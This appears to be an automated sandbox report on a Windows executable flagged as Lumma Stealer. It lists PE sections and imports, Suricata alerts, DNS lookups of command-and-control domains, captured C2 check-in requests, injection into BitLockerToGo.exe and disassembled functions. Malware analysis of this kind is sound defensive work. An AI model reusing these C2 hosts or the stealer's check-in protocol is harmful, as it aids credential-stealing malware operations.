int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007FBCC8C739E1h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc23000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6f000	0x1f54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc24000	0x49778	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb97520	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x535b88	0x535c00	820d7e43a48e1902e82cf6256d3cab04	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x537000	0x65ea44	0x65ec00	78fd4b9fd1ac3fc10f80fb57ad96a886	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb96000	0x8ca00	0x62c00	02a12f2e9333e830f7cab85db93ae977	False	0.3113726265822785	data	5.639409639051764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc23000	0x44c	0x600	6144f23690c86a380ed0e0d9b64a332c	False	0.3567708333333333	OpenPGP Public Key	3.859585944521697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xc24000	0x49778	0x49800	3998a519133b90d03927a767bdf3aa69	False	0.5691133875425171	data	6.672005572396596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xc6e000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xc6f000	0x1f54	0x2000	7f6e034c89ac12cac140ecbca0eb41b9	False	0.3316650390625	data	4.680708178865982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc6f1d4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5675675675675675
RT_ICON	0xc6f2fc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4486994219653179
RT_ICON	0xc6f864	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4637096774193548
RT_ICON	0xc6fb4c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3935018050541516
RT_GROUP_ICON	0xc703f4	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0xc70434	0x4f4	data	English	United States	0.27208201892744477
RT_MANIFEST	0xc70928	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T20:30:11.421106+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.4	58380	1.1.1.1	53	UDP
2024-09-28T20:30:12.005161+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.4	49730	172.67.132.32	443	TCP
2024-09-28T20:30:12.194811+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	172.67.132.32	443	TCP
2024-09-28T20:30:12.194811+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	172.67.132.32	443	TCP
2024-09-28T20:30:12.891286+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.4	49731	172.67.132.32	443	TCP
2024-09-28T20:30:13.401073+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	172.67.132.32	443	TCP
2024-09-28T20:30:13.401073+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.132.32	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 20:30:11.453541040 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:11.453584909 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:11.453672886 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:11.456805944 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:11.456825972 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.004889011 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.005161047 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.009429932 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.009445906 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.009934902 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.059969902 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.067627907 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.067687988 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.067800999 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.194825888 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.194864988 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.194919109 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.194936037 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.202212095 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.202275038 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.202282906 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.202394009 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.202454090 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.203418016 CEST	49730	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.203435898 CEST	443	49730	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.312257051 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.312308073 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.312386990 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.312819004 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.312836885 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.891145945 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.891285896 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.900542021 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.900561094 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.901016951 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:12.904277086 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.904297113 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:12.904380083 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:13.401125908 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:13.401361942 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:13.401443958 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:13.401554108 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:13.401597023 CEST	443	49731	172.67.132.32	192.168.2.4
Sep 28, 2024 20:30:13.401627064 CEST	49731	443	192.168.2.4	172.67.132.32
Sep 28, 2024 20:30:13.401642084 CEST	443	49731	172.67.132.32	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 20:30:11.391705990 CEST	65091	53	192.168.2.4	1.1.1.1
Sep 28, 2024 20:30:11.419092894 CEST	53	65091	1.1.1.1	192.168.2.4
Sep 28, 2024 20:30:11.421106100 CEST	58380	53	192.168.2.4	1.1.1.1
Sep 28, 2024 20:30:11.446846008 CEST	53	58380	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 28, 2024 20:30:11.391705990 CEST	192.168.2.4	1.1.1.1	0xe7f	Standard query (0)	pianoswimen.shop	A (IP address)	IN (0x0001)	false
Sep 28, 2024 20:30:11.421106100 CEST	192.168.2.4	1.1.1.1	0xdfab	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 28, 2024 20:30:11.419092894 CEST	1.1.1.1	192.168.2.4	0xe7f	Name error (3)	pianoswimen.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 28, 2024 20:30:11.446846008 CEST	1.1.1.1	192.168.2.4	0xdfab	No error (0)	gutterydhowi.shop		172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 28, 2024 20:30:11.446846008 CEST	1.1.1.1	192.168.2.4	0xdfab	No error (0)	gutterydhowi.shop		104.21.4.136	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gutterydhowi.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.132.32	443	2716	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 18:30:12 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-28 18:30:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-28 18:30:12 UTC	549	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 18:30:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHja0Qip4GRm78v1n0%2FRzc8EKjkHrjyNgsg9piZxev1mrquIBvIui6yPbBtYxNLiWrx8hSAG4agFXsbREnwtMqq0h5LxaQZsK5iOsaaMaBOHQDbV4ufmIuCR7MR9yXeqH8Z3Dw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca5cda5cb4b7292-EWR
2024-09-28 18:30:12 UTC	820	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-28 18:30:12 UTC	1369	IN	Data Raw: 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 Data Ascii: .errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie
2024-09-28 18:30:12 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 65 50 6b 6f 35 73 6a 71 66 34 61 32 48 54 6b 48 48 53 39 51 51 78 42 68 42 63 71 64 76 55 4e 33 49 6d 61 5a 50 77 38 52 53 62 77 2d 31 37 32 37 35 34 38 32 31 32 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c Data Ascii: <input type="hidden" name="atok" value="ePko5sjqf4a2HTkHHS9QQxBhBcqdvUN3ImaZPw8RSbw-1727548212-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" styl
2024-09-28 18:30:12 UTC	847	IN	Data Raw: 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c Data Ascii: hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a><
2024-09-28 18:30:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.132.32	443	2716	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 18:30:12 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=ePko5sjqf4a2HTkHHS9QQxBhBcqdvUN3ImaZPw8RSbw-1727548212-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 75 Host: gutterydhowi.shop
2024-09-28 18:30:12 UTC	75	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--2&j=5c9b8674a630d9101b46733aa37f15ec
2024-09-28 18:30:13 UTC	774	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 18:30:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g3rtacpqj8co4lvknp2aadj1sa; expires=Wed, 22 Jan 2025 12:16:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rA%2FpwwYsVY3VMbc0wGmyWxE7%2FgfVsejnUFYB7Nolf1W3cnznKP8YSo9lj6xbcr7HHOj2xiFD88FEcNr0VTpyr0njbdBRI4%2BLcdR20son00wF9KmVZYTooKjMfVEy2NwC5mr8pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca5cdab1bb041ff-EWR
2024-09-28 18:30:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-28 18:30:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:29:58
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe90000
File size:	12'859'392 bytes
MD5 hash:	54E50CC52A1D35CDD951D475E0FB7AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1802808473.0000000002002000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1802808473.000000000217D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:30:07
Start date:	28/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xaa0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	56.4%
Total number of Nodes:	94
Total number of Limit Nodes:	19

Executed Functions

Function 0040EC00 Relevance: 28.5, APIs: 1, Strings: 15, Instructions: 491
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(B925BB0D,00000000,HAVW), ref: 0040ECEE

Strings

HAVW, xrefs: 0040EC44, 0040EC50
b$=/, xrefs: 0040F11E
D>>., xrefs: 0040F1BE, 0040F187, 0040F193
QS, xrefs: 0040F01A
+]_, xrefs: 0040F002
>m%?, xrefs: 0040F10E
,8$$, xrefs: 0040F12E
gutterydhowi.shop, xrefs: 0040EF27
-8"<, xrefs: 0040F126
!61J, xrefs: 0040F116
##74, xrefs: 0040F136
Y[, xrefs: 0040F00A
2EG, xrefs: 0040EFF2
UW, xrefs: 0040F012
n, xrefs: 0040F14D

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: !61J$##74$+]_$,8$$$-8"<$2EG$>m%?$D>>.$HAVW$b$=/$gutterydhowi.shop$n$QS$UW$Y[
API String ID: 1029625771-3582260876
Opcode ID: d62f3d3c3aeeed038180ffbaa4b786737c045e3276e4653fbba5784ed784ba39
Instruction ID: e741205573997fc5930bff8a8ff017abff9bf96c4adf8bf1a8485fda196cc813
Opcode Fuzzy Hash: d62f3d3c3aeeed038180ffbaa4b786737c045e3276e4653fbba5784ed784ba39
Instruction Fuzzy Hash: ADF1DFB4418380DBD325DF10E8516AFBBE0BB86305F440C3EE5949B392E379C958CB9A

Function 004403D0 Relevance: 16.9, APIs: 11, Instructions: 388
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00440407
SysAllocString.OLEAUT32(?), ref: 00440462
SysAllocString.OLEAUT32(?), ref: 0044051B
SysFreeString.OLEAUT32(?), ref: 004406EE
SysFreeString.OLEAUT32(?), ref: 004406F3
SysFreeString.OLEAUT32(?), ref: 00440701
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044073D
SysStringLen.OLEAUT32(0F9A11F1), ref: 00440753
VariantInit.OLEAUT32(?), ref: 004408A4
VariantInit.OLEAUT32(?), ref: 004408AB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitVariant$BlanketInformationProxyVolume
String ID:
API String ID: 2481337946-0
Opcode ID: bb736de466a6ac7da5109a4aed1a770f6b5855cc53518b5f4e70dd64f7b30e0f
Instruction ID: e3ed2c47a0bb3cf872838d301436681c4dd272241afa8561d912496893234108
Opcode Fuzzy Hash: bb736de466a6ac7da5109a4aed1a770f6b5855cc53518b5f4e70dd64f7b30e0f
Instruction Fuzzy Hash: A1E17C74200700DFE3248F25D895B16B7B1FB4A305F24896DE5868B7A2C77AE856CF94

Function 0040D060 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040D071
GetCurrentThreadId.KERNEL32 ref: 0040D086
GetCurrentProcessId.KERNEL32 ref: 0040D08C
ExitProcess.KERNEL32 ref: 0040D260

Strings

3456, xrefs: 0040D223, 0040D22B
7()*, xrefs: 0040D1FE

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 3456$7()*
API String ID: 1029096631-676647874
Opcode ID: f5e9c1befa18d484bb97a4abe519d8d0d625722eb86c2ce19bd39a4bf10b4db1
Instruction ID: 2dbf804362d4aad14a2a7b31a3907f18b4f8b9ac49abf99468558087287d058f
Opcode Fuzzy Hash: f5e9c1befa18d484bb97a4abe519d8d0d625722eb86c2ce19bd39a4bf10b4db1
Instruction Fuzzy Hash: 3D513A7480C2409BD701BFA9D544A1EFBF5AF52704F048C6DE5C4A72A2D73AC819CB6B

Function 0040F4B0 Relevance: 5.4, Strings: 4, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

us, xrefs: 0040F552
ePko5sjqf4a2HTkHHS9QQxBhBcqdvUN3ImaZPw8RSbw-1727548212-0.0.1.1-/api, xrefs: 0040F947, 0040F964
Gw, xrefs: 0040F633, 0040F63B
}/{, xrefs: 0040F562

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Gw$ePko5sjqf4a2HTkHHS9QQxBhBcqdvUN3ImaZPw8RSbw-1727548212-0.0.1.1-/api$us$}/{
API String ID: 0-1355535845
Opcode ID: a53fa2150a86d6808e079bfb6e00a22777b662f47191a5b60fb647dda1c76ce6
Instruction ID: 91ebce8035d16f5fb770399a25548f6e4d2b9dd823b7fb84ccec241ce4f75783
Opcode Fuzzy Hash: a53fa2150a86d6808e079bfb6e00a22777b662f47191a5b60fb647dda1c76ce6
